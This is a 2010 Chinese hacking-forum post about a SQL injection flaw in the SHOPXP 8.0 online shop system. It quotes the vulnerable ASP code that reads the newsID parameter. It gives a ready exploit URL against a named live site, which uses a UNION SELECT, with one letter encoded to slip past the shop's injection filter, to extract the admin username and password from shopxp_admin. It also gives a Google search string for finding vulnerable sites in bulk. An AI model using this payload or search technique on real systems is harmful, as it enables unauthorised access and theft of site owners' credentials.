WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 1793查看
  • 0回复

主题

好友

1204

积分

金牌会员

发表于 2010-1-17 09:48:56 |显示全部楼层
情's blog

上次说了SHOPXP网上购物系统 7.4的注入漏洞   跟新了,看看8.0的

商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。

在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断


Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")

If request("action")="modify" Then
set rs=server.createobject("adodb.recordset")
sql="select * from shopxp_news where newsid="&newsid
rs.open sql,conn,1,1
     If Not rs.Eof Then
         Content=rs("newscontent")
     End If
     Response.Write Content
End If



构造URL注入即可。

exp:
http://www.gn918.cn/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

批量
google:inurl:shopxp_news.asp

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-30 02:57 , Processed in 0.060493 second(s), 16 queries .

返回顶部